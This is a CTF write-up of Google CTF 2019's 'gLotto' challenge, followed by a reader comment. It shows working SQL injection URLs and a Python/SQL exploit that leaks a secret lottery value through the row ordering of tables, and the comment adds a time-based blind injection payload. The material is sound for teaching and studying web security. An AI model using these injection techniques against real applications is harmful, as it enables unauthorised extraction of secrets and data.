Rating: 5.0

# gLotto
22 solves, 288 points

> Are you lucky?
> https://glotto.web.ctfcompetition.com/

## Analysis

The link goes to a "lottery" website, with tables of past winning tickets and an option to check your ticket. At the bottom of the page, there is a link to show the source.

We can see that the flag is given if you submit the winning ticket:
```php
if ($_POST['code'] === $win)
{
die("You won! $flag");
} else {
sleep(5);
die("You didn't win :(
The winning ticket was $win");
}
```

Additionally, a new winning ticket is randomly generated on every request to the home page, and the winning ticket is unset on checking a ticket, preventing you from just submitting the winning ticket without visiting the home page again.

The application also lets you sort each table by a key in a query parameter:
```php
for ($i = 0; $i < count($tables); $i++)
{
$order = isset($_GET["order{$i}"]) ? $_GET["order{$i}"] : '';
if (stripos($order, 'benchmark') !== false) die;
${"result$i"} = $db->query("SELECT * FROM {$tables[$i]} " . ($order != '' ? "ORDER BY `".$db->escape_string($order)."`" : ""));
if (!${"result$i"}) die;
}
```

The [documentation](https://www.php.net/manual/en/mysqli.real-escape-string.php) for `mysql::escape_string` lists the characters encoded:

> Characters encoded are NUL (ASCII 0), \n, \r, \, ', ", and Control-Z.

Notice that backticks are not on this list, so ```"ORDER BY `".$db->escape_string($order)."`"``` is vulnerable to SQL injection. Here is a very basic proof that this works:

```
https://glotto.web.ctfcompetition.com/?order0=winner`%20--%20
```

This URL sorts the March table by the `winner` column, since it results in the following query:

```sql
SELECT * FROM march ORDER BY `winner` -- `
```

The `--` comments out the extra backtick to prevent a syntax error.

At this point, it's also important to note that the winning ticket is assigned to an SQL variable that is never used again:
```php
$db->query("SET @lotto = '$winner'");
```

Interesting...

So, what can we do with the SQL injection? Well, the answer turns out to be "not much." The [MySQL documentation](https://dev.mysql.com/doc/refman/8.0/en/select.html) shows the valid syntax for a `SELECT` statement:

```sql
SELECT
[ALL | DISTINCT | DISTINCTROW ]
[HIGH_PRIORITY]
[STRAIGHT_JOIN]
[SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]
[SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]
select_expr [, select_expr ...]
[FROM table_references
[PARTITION partition_list]
[WHERE where_condition]
[GROUP BY {col_name | expr | position}, ... [WITH ROLLUP]]
[HAVING where_condition]
[WINDOW window_name AS (window_spec)
[, window_name AS (window_spec)] ...]
[ORDER BY {col_name | expr | position}
[ASC | DESC], ... [WITH ROLLUP]]
[LIMIT {[offset,] row_count | row_count OFFSET offset}]
[INTO OUTFILE 'file_name'
[CHARACTER SET charset_name]
export_options
| INTO DUMPFILE 'file_name'
| INTO var_name [, var_name]]
[FOR {UPDATE | SHARE} [OF tbl_name [, tbl_name] ...] [NOWAIT | SKIP LOCKED]
| LOCK IN SHARE MODE]]
```

Our injection is after `ORDER BY`, so the only fields we control are `ORDER BY`, `LIMIT`, `INTO`, and `FOR`. `INTO` and `FOR` are both pretty much useless for conveying information. `LIMIT` cannot be an expression, so it can't be used for sending data. That leaves the `ORDER BY` clause.

Since we have to specify a valid column for the first `ORDER BY`, and each column has unique values, it seems like we won't be able to control the ordering. However, we can add on to the expression to make it always return the same value and force it to use the secondary sort column. I chose to use `IS NOT NULL`. With this, we can sort by an arbitrary value. Let's try just sorting randomly:

```
https://glotto.web.ctfcompetition.com/?order0=winner`%20IS%20NOT%20NULL,%20RAND()%20--%20
```

This gives the following query:

```sql
SELECT * FROM march ORDER BY `winner` IS NOT NULL, RAND() -- `
```

As expected, the March table is ordered differently each time we visit the page.

## Exploitation

So we have complete control over the ordering. Is this enough to transmit the entire winning ticket? Let's look at the `gen_winner` function:

```php
function gen_winner($count, $charset='0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ')
{
$len = strlen($charset);
$rand = openssl_random_pseudo_bytes($count);
$secret = '';

for ($i = 0; $i < $count; $i++)
{
$secret .= $charset[ord($rand[$i]) % $len];
}
return $secret;
}
```

And how it is called:

```php
$winner = gen_winner(12);
```

This is essentially a 12 digit base36 number, so there are `36**12` possible tickets:
```python
>>> 36**12
4738381338321616896
```

We are able to sort 4 different tables, of lengths 9, 8, 7, and 4. If we make the meaning of the ordering of each table depend on the ordering of the previous tables, we can calculate the number of possible "messages":

```python
>>> fac(9)*fac(8)*fac(7)*fac(4)
1769804660736000
```

This means we can narrow it down to about 2,677 possible tickets:

```python
>>> 4738381338321616896/1769804660736000
2677.3470787172014
```

Since there is a `sleep(5)` when checking a ticket, each check takes a little over 5 seconds. If we parallelize our solution script, it is definitely possible to brute force \~2.7k in a reasonable amount of time (i.e. less than an hour).

### Encoding

We need to figure out how to encode information in the tables. A table of size `n` has `n!` permutations, so it can encode `n!` numbers based on ordering.

Let the default ordering of the table be `order[0, 1, 2, ... n]`. In order to encode a number `x` within the interval `[0, n!)`, first divide the interval into `n` subintervals: `[0, (n-1)!), [(n-1)!, 2*(n-1)!), ..., [(n-1)*(n-1)!, n*(n-1)!)`. If `x` lies within interval `i`, the new ordering begins with `order[i]`. Repeat within that interval, this time dividing into `n-1` subintervals. Of course, `order[i]` must be removed since it was already used; `n-1` elements remain.

Python implementations of encoding and decoding are given below:

```python
def encode(x, n):
rows = list(range(n))
order = []
for i in range(n-1, -1, -1):
order.append(rows.pop(x//fac(i)))
x %= fac(i)
return tuple(order)

def decode(order, n):
order = list(order)
rows = list(range(n))
x = 0
for i in range(n-1, -1, -1):
j = rows.index(order.pop(0))
x += j*fac(i)
rows.pop(j)
return x
```

The encoding function needs to be implemented in SQL. This seems hard at first since it uses a mutable array and pops indices from it, and we can only use simple SQL expressions. While it may be _possible_ to generate a bunch of `CASE` statements that give a single expression for transposing each position, it would also be incredibly long, and the web server has limits on how long the query string can be (which we encounter a little bit later).

However, a couple observations make this conversion a little bit easier:

1. Subqueries can be used to make "variables"
2. MySQL has support for a [JSON data type](https://dev.mysql.com/doc/refman/8.0/en/json.html)

To do incremental calculations that reuse previous ones, we can stack subqueries like so:

```sql
(SELECT c+1 as d FROM (SELECT b+1 as c FROM (SELECT a+1 as b FROM...
```

The important thing is that this allows us to reuse a previous calculation in multiple future calculations without retyping the entire expression. Another thing to note here is that we don't have any variables/state, just composition of functions (subqueries). This might remind you a little bit of lambda calculus.

In the Python implementation of `encode`, there are basically three pieces of state: `rows`, `order`, and `x`. `rows` is the remaining rows that have not been transposed. `order` is the output of the function (the map for transposition). `x` is the number to encode, modded by the interval size at each step. MySQL's JSON type can represent arrays, so that will be used for `rows` and `order`.

When sending a request to the server, the table sizes are predetermined, so anything depending on that can be hardcoded into the SQL query. We will implement a Python function that generates an SQL query to reorder a table of size `n` such that it extracts a number represented by the expression `expr`. The conditions that represent the original row order will be given in the array `m`:

```python
def sqlencode(expr, n, m):
```

The initial state of the encoding can be set with the following subquery (curly braces are used for formatting the string):

```sql
SELECT {expr} as s{n}, JSON_ARRAY({','.join(str(i) for i in range(n))}) as r{n}, JSON_ARRAY(0) as o{n}, CONCAT(CHAR(36), CHAR(91), CHAR(65), CHAR(93)) as h) AS t{n}
```

`x` is represented by `s{n}`, `rows` is represented by `r{n}`, and `order` is represented by `o{n}`. The `JSON_ARRAY` is initialized with a single element because on my local version of MariaDB, it turned into an empty string otherwise. It is not required against the server. `h` is a helper string, `'$[A]'`, that allows for a `REPLACE` to be used instead of reconstructing the entire JSON identifier each time. Without this optimization, the query ends up being too long and the web server rejects it. `CONCAT` and `CHAR` are used since single and double quotes are escaped in the PHP before being put in the query.

Subqueries are then added to the outside for each iteration of the loop in the Python implementation. These are of the format:

```sql
SELECT h, JSON_ARRAY_APPEND(o{i+1}, CONVERT(CHAR(36) USING utf8mb4), JSON_EXTRACT(r{i+1}, REPLACE(h,CHAR(65), CONVERT(s{i+1} DIV {fac(i)},char)))) as o{i}, MOD(s{i+1}, {fac(i)}) as s{i}, JSON_REMOVE(r{i+1}, REPLACE(h, CHAR(65), CONVERT(s{i+1} DIV {fac(i)},char))) AS r{i} FROM {subquery}) AS t{i}
```

`h` is selected so it can be used in the next query as well. `JSON_ARRAY_APPEND` is used to add the element at index `floor(x/(i!))` of `rows` to `order`. `CHAR(36)` is just `$`, which signifies the entire JSON array. It needs to be converted to `utf8mb4` because `JSON_ARRAY_APPEND` rejects binary encoding. `x` is calculated as the previous `x` mod `i!`, and `rows` has the element at index `floor(x/(i!))` removed. `REPLACE` is used to replace the `A` in `$[A]` with the proper index.

Now that the output array is calculated, the rows need to be sorted correctly. A `CASE` statement is constructed based on the array of conditions, `m`, to order the rows, and a final query is constructed. The full function can be seen below:

```python
def sqlencode(expr, n, m):
query = f"(SELECT {expr} as s{n},JSON_ARRAY({','.join(str(i)for i in range(n))}) as r{n},JSON_ARRAY(0) as o{n},CONCAT(CHAR(36),CHAR(91),CHAR(65),CHAR(93)) as h) AS t{n}"
for i in range(n-1, -1, -1):
query = f"(SELECT h,JSON_ARRAY_APPEND(o{i+1}, CONVERT(CHAR(36) USING utf8mb4), JSON_EXTRACT(r{i+1},REPLACE(h,CHAR(65),CONVERT(s{i+1} DIV {fac(i)},char)))) as o{i}, MOD(s{i+1}, {fac(i)}) as s{i}, JSON_REMOVE(r{i+1}, REPLACE(h,CHAR(65),CONVERT(s{i+1} DIV {fac(i)},char))) AS r{i} FROM " + query + f") AS t{i}"
jsonquery = "JSON_EXTRACT(o0,CONCAT(CHAR(36),CHAR(91),CONVERT({index},char),CHAR(93)))"
cases = "CASE"
for i in range(len(m)):
cases += f" WHEN {m[i]} THEN {jsonquery.format(index=i+1)}"
cases += " ELSE NULL END"
query = "(SELECT " + cases + " FROM " + query + ")"
return query
```

To decode a number retrieved from the server, we figure out which row was moved where and plug an array of that into the `decode` function:

```python
def sqldecode(r, n, m):
s = sorted(list(map(lambda x:(r.index(x), x), m)), key=lambda x:x[0])
encoded = []
for t in m:
encoded.append([i[1] for i in s].index(t))
encoded = tuple(encoded)
return decode(encoded, n)
```

`r` is the server response, `n` is the number of rows, and `m` is an array the of tickets in their original order.

### Exfiltration

We can now transmit 4 numbers in the ranges `[0,9!)`, `[0,8!)`, `[0,7!)`, and `[0,4!)`. To get the possibilities for the winning lottery ticket, we convert it to a base36 number and use each table to get a range of possible values.

We want to divide the number so that it fits in the range of the first table, `[0,8!)`. The maximum value is `36**12 - 1` (`ZZZZZZZZZZZZ`), so we take that and divide it by `8!`:

```python
>>> ceil((36**12 - 1)/fac(8))
117519378430596
```

Our first piece of data we get is which interval of size 117519378430596 the winning ticket lies in. We then take the winning number modulo 117519378430596, and split that into intervals that give indices up to the size of our next table, `9!`. This process is repeated for each table until we narrow it down to 2,677 values and guess one of them.

A couple helper functions are defined to construct the queries and URL parameters:

```python
param = lambda q: f"winner` IS NOT NULL, {q} -- "
num = lambda m1,m2,m3,d: f"(MOD(MOD(MOD(CAST(CONV(@lotto, 36, 10) AS UNSIGNED), {m1}),{m2}),{m3}) DIV {d})"
```

And we make a guess and hopefully get the flag:

```python
rs = requests.session()
r = rs.get(url, params={
"order0": param(sqlencode(num(36**12, 36**12, 36**12, 117519378430596), 8, march)),
"order1": param(sqlencode(num(36**12, 36**12, 117519378430596, 323851903), 9, april)),
"order2": param(sqlencode(num(36**12, 117519378430596, 323851903, 64257), 7, may)),
"order3": param(sqlencode(num(117519378430596, 323851903, 64257, 2678), 4, june))
})
r1 = sqldecode(r.text, 8, marcht)
r2 = sqldecode(r.text, 9, aprilt)
r3 = sqldecode(r.text, 7, mayt)
r4 = sqldecode(r.text, 4, junet)
guess = 117519378430596*r1 + 323851903*r2 + 64257*r3 + 2678*r4 + 100
r = rs.post(url, data={"code":base36encode(guess).zfill(12)})
if "CTF" in r.text:
print(r.text)
```

Full solution script at original writeup link.

Original writeup (https://kmh.zone/writeups/googlectf-2019/glotto.html).
the4960June 24, 2019, 5:10 a.m.

Great job. I didn't know you could escape the `winner`. I going with a very ineffective (and effectively unfeasible) approach of checking one static key upon a GET request doing a time based attack. Since the key was renewed each GET, I was able to check if the winner was equal to a string during the query. Since there was a watchdog, each GET always responded in roughly 6 seconds, so I could not check more than or two keys with certainty. I was running like 40 instances of my script each doing an average of 2.5 GET request per second - which I hoped was faster than the 5 second penalty for a bad POST, but the key collision never got a hit. Anyways, well done.

(e.g. of the query I was running)
https://glotto.web.ctfcompetition.com/?order0=winner`,(select case when (concat(CHAR(67),CHAR(65),CHAR(53),CHAR(71),CHAR(56),CHAR(86),CHAR(73),CHAR(66),CHAR(54),CHAR(85),CHAR(67),CHAR(57))=(select @lotto)) then (select sleep(5)) else 1 end) limit 1;%23